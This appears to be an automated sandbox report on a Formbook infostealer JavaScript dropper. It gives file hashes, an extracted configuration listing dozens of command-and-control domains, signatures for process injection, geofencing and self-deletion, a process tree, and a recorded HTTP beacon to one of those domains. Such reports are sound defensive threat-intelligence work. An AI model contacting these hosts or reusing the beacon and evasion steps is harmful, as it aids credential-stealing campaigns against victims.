Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-12-2024 00:59
Static task
static1
Behavioral task
behavioral1
Sample
ySNxzGtmAt_bin.js
Resource
win7-20241010-en
General
-
Target
ySNxzGtmAt_bin.js
-
Size
343KB
-
MD5
2c1b8ce86a48542a827bb302d54eb19c
-
SHA1
6c5b668d122791450edb50027312f22d22eeb39b
-
SHA256
c89f8224348c1c86bf84db8a6596f1ff4fdad498669918393fc6325b7a1476e8
-
SHA512
88bcb4feb1e9a0dfc378d106faa5e979c1505c17483e9ae7e68e8782f0563ca0248f712f0f1b384d7c97b7ef65e0665b72af28a5b9852c030cedec7c67ab5e65
-
SSDEEP
6144:P+58K9NNqVEmncYRk/ykRCa7ljUuqeYGEirkxMdv1K8glhknGC80F0+WwpOj:lK9NNqVEGVRk/ykRCaRjUGHjrkSXK8gT
Malware Config
Extracted
formbook
4.1
t01w
yeluzishiyanshi.com
thehardtech.xyz
arrowheadk8.site
zaulkunutila.xyz
lookastro.net
congregorecruitment.co.uk
darcyboo.uk
collettesbet.net
ltgpd.com
hiddenapphq.net
haxtrl.online
esenbook.com
jxzyyx.com
ulvabuyout.xyz
instashop.life
vazra.top
ewdvatcuce4.top
zhishi68.com
fabricsandfashion.com
hootcaster.com
chadwelchart.com
zamoracollection.com
eoliq.com
fbo.app
551by.com
cbbtraffic.site
prepasigma.com
cinq.design
maxsonrealty.com
xzxzk.com
mein-digitales-testament.online
beachloungespa.com
atninja.xyz
secure-internetbanking-help.com
beautyinfluencers.club
kcssteakandribsohio.com
local-dress.store
zhuilang.net
youngdongent.com
bobijnvidit.xyz
buyicx.com
zipular.com
unverify.us
tudoristan.com
texasonmission.com
premintbot.xyz
tricon.info
dinazorpizza.com
minhlam.store
sustainabledentists.com
cocolmanual.xyz
illegalz.agency
homecrowds.net
polyfake.com
omgsweepsship.com
asteliaceramika.com
retro235.space
35kclub.com
lemex.co.uk
bebigshop.com
customrenovatl.com
palccoyotour.com
adanarinoplasti.xyz
calnovi.com
techreshendo.com
Signatures
-
Formbook family
-
Formbook payload 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023ca3-6.dat formbook behavioral2/memory/748-12-0x0000000000190000-0x00000000001BF000-memory.dmp formbook behavioral2/memory/2520-16-0x0000000000B60000-0x0000000000B8F000-memory.dmp formbook -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 748 bin.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 748 set thread context of 3568 748 bin.exe 56 PID 2520 set thread context of 3568 2520 wscript.exe 56 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 62 IoCs
pid Process 748 bin.exe 748 bin.exe 748 bin.exe 748 bin.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe 2520 wscript.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 748 bin.exe 748 bin.exe 748 bin.exe 2520 wscript.exe 2520 wscript.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 748 bin.exe Token: SeDebugPrivilege 2520 wscript.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 4900 wrote to memory of 2232 4900 wscript.exe 82 PID 4900 wrote to memory of 2232 4900 wscript.exe 82 PID 4900 wrote to memory of 748 4900 wscript.exe 83 PID 4900 wrote to memory of 748 4900 wscript.exe 83 PID 4900 wrote to memory of 748 4900 wscript.exe 83 PID 3568 wrote to memory of 2520 3568 Explorer.EXE 84 PID 3568 wrote to memory of 2520 3568 Explorer.EXE 84 PID 3568 wrote to memory of 2520 3568 Explorer.EXE 84 PID 2520 wrote to memory of 1560 2520 wscript.exe 85 PID 2520 wrote to memory of 1560 2520 wscript.exe 85 PID 2520 wrote to memory of 1560 2520 wscript.exe 85
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ySNxzGtmAt_bin.js2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\qbXmtbQkpB.js"3⤵PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\bin.exe"C:\Users\Admin\AppData\Local\Temp\bin.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\bin.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1560
-
-
Network
-
Remote address:8.8.8.8:53Request149.220.183.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request81.144.22.2.in-addr.arpaIN PTRResponse81.144.22.2.in-addr.arpaIN PTRa2-22-144-81deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request72.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request13.86.106.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request197.87.175.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request171.39.242.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request107.12.20.2.in-addr.arpaIN PTRResponse107.12.20.2.in-addr.arpaIN PTRa2-20-12-107deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestwww.vazra.topIN AResponse
-
Remote address:8.8.8.8:53Requestwww.homecrowds.netIN AResponsewww.homecrowds.netIN CNAMEparkingpage.namecheap.comparkingpage.namecheap.comIN A91.195.240.19
-
GEThttp://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0GExplorer.EXERemote address:91.195.240.19:80RequestGET /t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G HTTP/1.1
Host: www.homecrowds.net
Connection: close
ResponseHTTP/1.1 403 Forbidden
cache-control: no-cache
content-type: text/html
connection: close
-
Remote address:8.8.8.8:53Request19.240.195.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.omgsweepsship.comIN AResponse
-
Remote address:8.8.8.8:53Request13.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.ulvabuyout.xyzIN AResponse
-
Remote address:8.8.8.8:53Requestwww.adanarinoplasti.xyzIN AResponse
-
Remote address:8.8.8.8:53Requestwww.secure-internetbanking-help.comIN AResponse
-
91.195.240.19:80http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0GhttpExplorer.EXE404 B 376 B 5 4
HTTP Request
GET http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0GHTTP Response
403
-
73 B 147 B 1 1
DNS Request
149.220.183.52.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
81.144.22.2.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
72.32.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
13.86.106.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
28.118.140.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
197.87.175.4.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
107.12.20.2.in-addr.arpa
-
59 B 129 B 1 1
DNS Request
www.vazra.top
-
64 B 119 B 1 1
DNS Request
www.homecrowds.net
DNS Response
91.195.240.19
-
72 B 156 B 1 1
DNS Request
19.240.195.91.in-addr.arpa
-
67 B 140 B 1 1
DNS Request
www.omgsweepsship.com
-
72 B 158 B 1 1
DNS Request
13.227.111.52.in-addr.arpa
-
64 B 129 B 1 1
DNS Request
www.ulvabuyout.xyz
-
69 B 134 B 1 1
DNS Request
www.adanarinoplasti.xyz
-
81 B 154 B 1 1
DNS Request
www.secure-internetbanking-help.com
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
185KB
MD56b9e28b6f51709866a46b4a8b98a1b6f
SHA11dcbaffb6aa748637216c498f0fee1f6d399263a
SHA2564d47123169619362bf77feb0a764db9f2773f51374eb7a4ec71cc6f9b01d15f6
SHA512557e807c93283552e7da7f34c8002af3657cabdacfbeb86d5b4336250ef67ccaa54a46bc084105028fd331c6f0e012bd064d7021ca8220d0cbdc5a7a1577f362
-
Filesize
2KB
MD563eddccafac5a2d46e70ad8368008a2c
SHA1999b0c61359b570044b0f0be55bc490322e80ae6
SHA2565c571d13ce29d36517e2e42e2999627e8d58a3ce037117ab13a904c5fe9b0953
SHA5120775702f1a89fa990c193a3fa123120d2d236535c7e5829a1f806bb4f6bdfd381cb2f2c7b5ab69bd906853110e6dfcc3db1cc3704f2db58ca112d0d7596bc930